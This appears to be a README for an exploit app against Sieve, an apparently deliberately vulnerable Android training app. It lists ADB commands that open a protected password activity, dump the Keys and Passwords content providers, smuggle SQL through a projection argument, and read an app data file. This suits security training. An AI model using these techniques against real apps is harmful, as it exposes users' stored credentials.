sieve_pwn_max

• an app which exploits several vulnerabilities in sieve.apk
• check Releases

how to invoke each function via ADB :

func1

adb shell am start -n com.mwr.example.sieve/com.mwr.example.sieve.PWList

func2

adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Keys/

func3

adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Passwords/

func4

adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Keys/ --projection '* FROM Passwords;'

func5

adb shell cat /data/data/com.mwr.example.sieve.FileBackupProvider/files/etc/hosts